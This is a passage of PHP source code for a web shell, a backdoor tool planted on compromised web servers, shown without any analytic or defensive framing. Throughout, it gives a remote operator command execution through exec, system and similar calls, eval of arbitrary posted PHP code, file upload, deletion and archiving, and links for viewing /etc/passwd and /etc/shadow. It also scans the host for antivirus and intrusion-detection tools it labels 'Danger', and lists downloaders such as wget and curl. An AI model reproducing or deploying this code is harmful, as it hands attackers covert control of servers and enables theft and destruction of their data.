Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Safe mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\');\r\n\tif(!empty($GLOBALS[\'auth_pass\']))\r\n\t\t$m[\'Logout\'] = \'Logout\';\r\n\t$m[\'Self remove\'] = \'SelfRemove\';\r\n\t$menu = \'\';\r\n\tforeach($m as $k => $v)\r\n\t\t$menu .= \'<th width="\'.(int)(100/count($m)).\'%">[ <a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a> ]</th>\';\r\n\r\n\t$drives = "";\r\n\tif($GLOBALS[\'os\'] == \'win\') {\r\n\t\tforeach(range(\'c\',\'z\') as $drive)\r\n\t\tif(is_dir($drive.\':\\\\\'))\r\n\t\t\t$drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n\t}\r\n\techo \'<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:\' . ($GLOBALS[\'os\'] == \'win\'?\'<br>Drives:\':\'\') . \'</span></td>\'\r\n . \'<td><nobr>\' . substr(@php_uname(), 0, 120) . \' <a href="\' . $explink . \'" target=_blank>[exploit-db.com]</a></nobr><br>\' . $uid . \' ( \' . $user . \' ) <span>Group:</span> \' . $gid . \' ( \' . $group . \' )<br>\' . @phpversion() . \' <span>Safe mode:</span> \' . ($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=#00bb00><b>OFF</b></font>\')\r\n . \' <a href=# onclick="g(\\\'Php\\\',null,\\\'\\\',\\\'info\\\')">[ phpinfo ]</a> <span>Datetime:</span> \' . date(\'Y-m-d H:i:s\') . \'<br>\' . BOFFViewSize($totalSpace) . \' <span>Free:</span> \' . BOFFViewSize($freeSpace) . \' (\'. (int) ($freeSpace/$totalSpace*100) . \'%)<br>\' . $cwd_links . \' \'. BOFFPermsColor($GLOBALS[\'cwd\']) . \' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\' . $GLOBALS[\'home_cwd\'] . \'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a><br>\' . $drives . \'</td>\'\r\n . \'<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">\' . $opt_charsets . \'</optgroup></select><br><span>Server IP:</span><br>\' . @$_SERVER["SERVER_ADDR"] . \'<br><span>Client IP:</span><br>\' . $_SERVER[\'REMOTE_ADDR\'] . \'</nobr></td></tr></table>\'\r\n . \'<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>\' . $menu . \'</tr></table><div style="margin:5">\';\r\n}\r\n\r\nfunction BOFFFooter() {\r\n\t$is_writable = is_writable($GLOBALS[\'cwd\'])?" <font color=\'#25ff00\'>(Writeable)</font>":" <font color=red>(Not writable)</font>";\r\n echo "\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style=\'border-top:2px solid #333;border-bottom:2px solid #333;\'>\r\n\t<tr>\r\n\t\t<td><form onsubmit=\'g(null,this.c.value,\\"\\");return false;\'><span>Change dir:</span><br><input class=\'toolsInp\' type=text name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=submit value=\'>>\'></form></td>\r\n\t\t<td><form onsubmit=\\"g(\'FilesTools\',null,this.f.value);return false;\\"><span>Read file:</span><br><input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\"g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;\\"><span>Make dir:</span>$is_writable<br><input class=\'toolsInp\' type=text name=d><input type=submit value=\'>>\'></form></td>\r\n\t\t<td><form onsubmit=\\"g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;\\"><span>Make file:</span>$is_writable<br><input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\"g(\'Console\',null,this.c.value);return false;\\"><span>Execute:</span><br><input class=\'toolsInp\' type=text name=c value=\'\'><input type=submit value=\'>>\'></form></td>\r\n\t\t<td><form method=\'post\' ENCTYPE=\'multipart/form-data\'>\r\n\t\t<input type=hidden name=a value=\'FilesMAn\'>\r\n\t\t<input type=hidden name=c value=\'" . $GLOBALS[\'cwd\'] ."\'>\r\n\t\t<input type=hidden name=p1 value=\'uploadFile\'>\r\n\t\t<input type=hidden name=charset value=\'" . (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') . "\'>\r\n\t\t<span>Upload file:</span>$is_writable<br><input class=\'toolsInp\' type=file name=f><input type=submit value=\'>>\'></form><br ></td>\r\n\t</tr></table></div></body></html>";\r\n}\r\n\r\nif (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) {\r\n function posix_getpwuid($p) {return false;} }\r\nif (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) {\r\n function posix_getgrgid($p) {return false;} }\r\n\r\nfunction BOFFEx($in) {\r\n\t$out = \'\';\r\n\tif (function_exists(\'exec\')) {\r\n\t\t@exec($in,$out);\r\n\t\t$out = @join("\\n",$out);\r\n\t} elseif (function_exists(\'passthru\')) {\r\n\t\tob_start();\r\n\t\t@passthru($in);\r\n\t\t$out = ob_get_clean();\r\n\t} elseif (function_exists(\'system\')) {\r\n\t\tob_start();\r\n\t\t@system($in);\r\n\t\t$out = ob_get_clean();\r\n\t} elseif (function_exists(\'shell_exec\')) {\r\n\t\t$out = shell_exec($in);\r\n\t} elseif (is_resource($f = @popen($in,"r"))) {\r\n\t\t$out = "";\r\n\t\twhile(!@feof($f))\r\n\t\t\t$out .= fread($f,1024);\r\n\t\tpclose($f);\r\n\t}\r\n\treturn $out;\r\n}\r\nfunction BOFFViewSize($s) {\r\n\tif($s >= 1073741824)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n\telseif($s >= 1048576)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n\telseif($s >= 1024)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n\telse\r\n\t\treturn $s . \' B\';\r\n}\r\n\r\nfunction BOFFPerms($p) {\r\n\tif (($p & 0xC000) == 0xC000)$i = \'s\';\r\n\telseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n\telseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n\telseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n\telseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n\telseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n\telseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n\telse $i = \'u\';\r\n\t$i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n\treturn $i;\r\n}\r\n\r\nfunction BOFFPermsColor($f) {\r\n\tif (!@is_readable($f))\r\n\t\treturn \'<font color=#FF0000>\' . BOFFPerms(@fileperms($f)) . \'</font>\';\r\n\telseif (!@is_writable($f))\r\n\t\treturn \'<font color=white>\' . BOFFPerms(@fileperms($f)) . \'</font>\';\r\n\telse\r\n\t\treturn \'<font color=#25ff00>\' . BOFFPerms(@fileperms($f)) . \'</font>\';\r\n}\r\n\r\nif(!function_exists("scandir")) {\r\n\tfunction scandir($dir) {\r\n\t\t$dh = opendir($dir);\r\n\t\twhile (false !== ($filename = readdir($dh)))\r\n \t\t$files[] = $filename;\r\n\t\treturn $files;\r\n\t}\r\n}\r\n\r\nfunction BOFFWhich($p) {\r\n\t$path = BOFFEx(\'which \' . $p);\r\n\tif(!empty($path))\r\n\t\treturn $path;\r\n\treturn false;\r\n}\r\n\r\nfunction actionSecInfo() {\r\n\tBOFFHeader();\r\n\techo \'<h1>Server security information</h1><div class=content>\';\r\n\tfunction BOFFSecParam($n, $v) {\r\n\t\t$v = trim($v);\r\n\t\tif($v) {\r\n\t\t\techo \'<span>\' . $n . \': </span>\';\r\n\t\t\tif(strpos($v, "\\n") === false)\r\n\t\t\t\techo $v . \'<br>\';\r\n\t\t\telse\r\n\t\t\t\techo \'<pre class=ml1>\' . $v . \'</pre>\';\r\n\t\t}\r\n\t}\r\n\t\r\n\tBOFFSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n if(function_exists(\'apache_get_modules\'))\r\n BOFFSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));\r\n\tBOFFSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');\r\n\tBOFFSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n\tBOFFSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n\tBOFFSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n\tBOFFSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n\t$temp=array();\r\n\tif(function_exists(\'mysql_get_client_info\'))\r\n\t\t$temp[] = "MySql (".mysql_get_client_info().")";\r\n\tif(function_exists(\'mssql_connect\'))\r\n\t\t$temp[] = "MSSQL";\r\n\tif(function_exists(\'pg_connect\'))\r\n\t\t$temp[] = "PostgreSQL";\r\n\tif(function_exists(\'oci_connect\'))\r\n\t\t$temp[] = "Oracle";\r\n\tBOFFSecParam(\'Supported databases\', implode(\', \', $temp));\r\n\techo \'<br>\';\r\n\t\r\n\tif($GLOBALS[\'os\'] == \'nix\') {\r\n\t\tBOFFSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n\t\tBOFFSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n\t\tBOFFSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n\t\tBOFFSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n\t\tif(!$GLOBALS[\'safe_mode\']) {\r\n $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n\t\t\techo \'<br>\';\r\n\t\t\t$temp=array();\r\n\t\t\tforeach ($userful as $item)\r\n\t\t\t\tif(BOFFWhich($item))\r\n $temp[] = $item;\r\n\t\t\tBOFFSecParam(\'Userful\', implode(\', \',$temp));\r\n\t\t\t$temp=array();\r\n\t\t\tforeach ($danger as $item)\r\n\t\t\t\tif(BOFFWhich($item))\r\n $temp[] = $item;\r\n\t\t\tBOFFSecParam(\'Danger\', implode(\', \',$temp));\r\n\t\t\t$temp=array();\r\n\t\t\tforeach ($downloaders as $item) \r\n\t\t\t\tif(BOFFWhich($item))\r\n $temp[] = $item;\r\n\t\t\tBOFFSecParam(\'Downloaders\', implode(\', \',$temp));\r\n\t\t\techo \'<br/>\';\r\n BOFFSecParam(\'HDD space\', BOFFEx(\'df -h\'));\r\n\t\t\tBOFFSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n\t\t}\r\n\t} else {\r\n\t\tBOFFSecParam(\'OS Version\',BOFFEx(\'ver\'));\r\n\t\tBOFFSecParam(\'Account Settings\',BOFFEx(\'net accounts\'));\r\n\t\tBOFFSecParam(\'User Accounts\',BOFFEx(\'net user\'));\r\n\t}\r\n\techo \'</div>\';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionPhp() {\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\t$_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = true;\r\n\t\tob_start();\r\n\t\teval($_POST[\'p1\']);\r\n\t\t$temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'" . addcslashes(htmlspecialchars(ob_get_clean()), "\\n\\r\\t\\\\\'\\0") . "\';\\n";\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit; \r\n\t}\r\n\tBOFFHeader();\r\n\tif(isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\')) {\r\n\t\techo \'<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>\';\r\n\t\tob_start();\r\n\t\tphpinfo();\r\n\t\t$tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU\',\'\',$tmp);\r\n\t\t$tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n\t\techo str_replace(\'<h1\',\'<h2\', $tmp) .\'</div><br>\';\r\n\t}\r\n\tif(empty($_POST[\'ajax\']) && !empty($_POST[\'p1\']))\r\n\t\t$_SESSION[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\\\'Php\\\',null,this.code.value);}else{g(\\\'Php\\\',null,this.code.value,\\\'\\\');}return false;"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n\techo \' <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\':\'\').\'margin-top:5px;" class=ml1>\';\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tob_start();\r\n\t\teval($_POST[\'p1\']);\r\n\t\techo htmlspecialchars(ob_get_clean());\r\n\t}\r\n\techo \'</pre></div>\';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionFilesMan() {\r\n\tBOFFHeader();\r\n\techo \'<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>\';\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tswitch($_POST[\'p1\']) {\r\n\t\t\tcase \'uploadFile\':\r\n\t\t\t\tif(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\']))\r\n\t\t\t\t\techo "Can\'t upload file!";\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'mkdir\':\r\n\t\t\t\tif(!@mkdir($_POST[\'p2\']))\r\n\t\t\t\t\techo "Can\'t create new dir";\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'delete\':\r\n\t\t\t\tfunction deleteDir($path) {\r\n\t\t\t\t\t$path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n\t\t\t\t\t$dh = opendir($path);\r\n\t\t\t\t\twhile ( ($item = readdir($dh) ) !== false) {\r\n\t\t\t\t\t\t$item = $path.$item;\r\n\t\t\t\t\t\tif ( (basename($item) == "..") || (basename($item) == ".") )\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t$type = filetype($item);\r\n\t\t\t\t\t\tif ($type == "dir")\r\n\t\t\t\t\t\t\tdeleteDir($item);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($item);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tclosedir($dh);\r\n\t\t\t\t\t@rmdir($path);\r\n\t\t\t\t}\r\n\t\t\t\tif(is_array(@$_POST[\'f\']))\r\n\t\t\t\t\tforeach($_POST[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n\t\t\t\t\t\t$f = urldecode($f);\r\n\t\t\t\t\t\tif(is_dir($f))\r\n\t\t\t\t\t\t\tdeleteDir($f);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($f);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'paste\':\r\n\t\t\t\tif($_SESSION[\'act\'] == \'copy\') {\r\n\t\t\t\t\tfunction copy_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_SESSION[\'f\'] as $f)\r\n\t\t\t\t\t\tcopy_paste($_SESSION[\'c\'],$f, $GLOBALS[\'cwd\']);\t\t\t\t\t\r\n\t\t\t\t} elseif($_SESSION[\'act\'] == \'move\') {\r\n\t\t\t\t\tfunction move_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(@is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_SESSION[\'f\'] as $f)\r\n\t\t\t\t\t\t@rename($_SESSION[\'c\'].$f, $GLOBALS[\'cwd\'].$f);\r\n\t\t\t\t} elseif($_SESSION[\'act\'] == \'zip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n if ($zip->open($_POST[\'p2\'], 1)) {\r\n chdir($_SESSION[\'c\']);\r\n foreach($_SESSION[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n if(@is_file($_SESSION[\'c\'].$f))\r\n $zip->addFile($_SESSION[\'c\'].$f, $f);\r\n elseif(@is_dir($_SESSION[\'c\'].$f)) {\r\n $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\'));\r\n foreach ($iterator as $key=>$value) {\r\n $zip->addFile(realpath($key), $key);\r\n }\r\n }\r\n }\r\n chdir($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n\t\t\t\t} elseif($_SESSION[\'act\'] == \'unzip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n foreach($_SESSION[\'f\'] as $f) {\r\n if($zip->open($_SESSION[\'c\'].$f)) {\r\n $zip->extractTo($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n }\r\n\t\t\t\t} elseif($_SESSION[\'act\'] == \'tar\') {\r\n chdir($_SESSION[\'c\']);\r\n $_SESSION[\'f\'] = array_map(\'escapeshellarg\', $_SESSION[\'f\']);\r\n BOFFEx(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_SESSION[\'f\']));\r\n chdir($GLOBALS[\'cwd\']);\r\n\t\t\t\t}\r\n\t\t\t\tunset($_SESSION[\'f\']);\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n if(!empty($_POST[\'p1\'])) {\r\n\t\t\t\t\t$_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n\t\t\t\t\t$_SESSION[\'f\'] = @$_POST[\'f\'];\r\n\t\t\t\t\tforeach($_SESSION[\'f\'] as $k => $f)\r\n\t\t\t\t\t\t$_SESSION[\'f\'][$k] = urldecode($f);\r\n\t\t\t\t\t$_SESSION[\'c\'] = @$_POST[\'c\'];\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\t$dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n\tif($dirContent === false) {\techo \'Can\\\'t open this folder!\';BOFFFooter(); return; }\r\n\tglobal $sort;\r\n\t$sort = array(\'name\', 1);\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tif(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))\r\n\t\t\t$sort = array($match[1], (int)$match[2]);\r\n\t}\r\necho "<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == \'checkbox\')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>\r\n<form name=files method=post><tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n\t$dirs = $files = array();\r\n\t$n = count($dirContent);\r\n\tfor($i=0;$i<$n;$i++) {\r\n\t\t$ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n\t\t$gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n\t\t$tmp = array(\'name\' => $dirContent[$i],\r\n\t\t\t\t\t \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],\r\n\t\t\t\t\t \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),\r\n\t\t\t\t\t \'perms\' => BOFFPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),\r\n\t\t\t\t\t \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),\r\n\t\t\t\t\t \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),\r\n\t\t\t\t\t \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])\r\n\t\t\t\t\t);\r\n\t\tif(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n\t\telseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\r\n\t\telseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i])&& ($dirContent[$i] != "."))\r\n\t\t\t$dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n\t}\r\n\t$GLOBALS[\'sort\'] = $sort;\r\n\tfunction BOFFCmp($a, $b) {\r\n\t\tif($GLOBALS[\'sort\'][0] != \'size\')\r\n\t\t\treturn strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t\telse\r\n\t\t\treturn (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n\t}\r\n\tusort($files, "BOFFCmp");\r\n\tusort($dirs, "BOFFCmp");\r\n\t$files = array_merge($dirs, $files);\r\n\t$l = 0;\r\n\tforeach($files as $f) {\r\n\t\techo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');" title=\' . $f[\'link\'] . \'><b>[ \' . htmlspecialchars($f[\'name\']) . \' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?BOFFViewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\']\r\n\t\t\t.\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n\t\t$l = $l?0:1;\r\n\t}\r\n\techo "<tr><td colspan=7>\r\n\t<input type=hidden name=a value=\'FilesMan\'>\r\n\t<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>\r\n\t<input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\')."\'>\r\n\t<select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>";\r\n if(class_exists(\'ZipArchive\'))\r\n echo "<option value=\'zip\'>Compress (zip)</option><option value=\'unzip\'>Uncompress (zip)</option>";\r\n echo "<option value=\'tar\'>Compress (tar.gz)</option>";\r\n if(!empty($_SESSION[\'act\']) && @count($_SESSION[\'f\']))\r\n echo "<option value=\'paste\'>Paste / Compress</option>";\r\n echo "</select> ";\r\n if(!empty($_SESSION[\'act\']) && @count($_SESSION[\'f\']) && (($_SESSION[\'act\'] == \'zip\') || ($_SESSION[\'act\'] == \'tar\')))\r\n echo "file name: <input type=text name=p2 value=\'BOFF_" . date("Ymd_His") . "." . ($_SESSION[\'act\'] == \'zip\'?\'zip\':\'tar.gz\') . "\'> ";\r\n echo "<input type=\'submit\' value=\'>>\'></td></tr></form></table></div>";\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionStringTools() {\r\n\tif(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}\r\n if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}}\r\n\tif(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}\r\n\tif(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= sprintf(\'%02X\',ord($p[$i]));return strtoupper($r);}}\r\n\tif(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= \'%\'.dechex(ord($p[$i]));return strtoupper($r);}}\r\n\t$stringTools = array(\r\n\t\t\'Base64 encode\' => \'base64_encode\',\r\n\t\t\'Base64 decode\' => \'base64_decode\',\r\n\t\t\'Url encode\' => \'urlencode\',\r\n\t\t\'Url decode\' => \'urldecode\',\r\n\t\t\'Full urlencode\' => \'full_urlencode\',\r\n\t\t\'md5 hash\' => \'md5\',\r\n\t\t\'sha1 hash\' => \'sha1\',\r\n\t\t\'crypt\' => \'crypt\',\r\n\t\t\'CRC32\' => \'crc32\',\r\n\t\t\'ASCII to HEX\' => 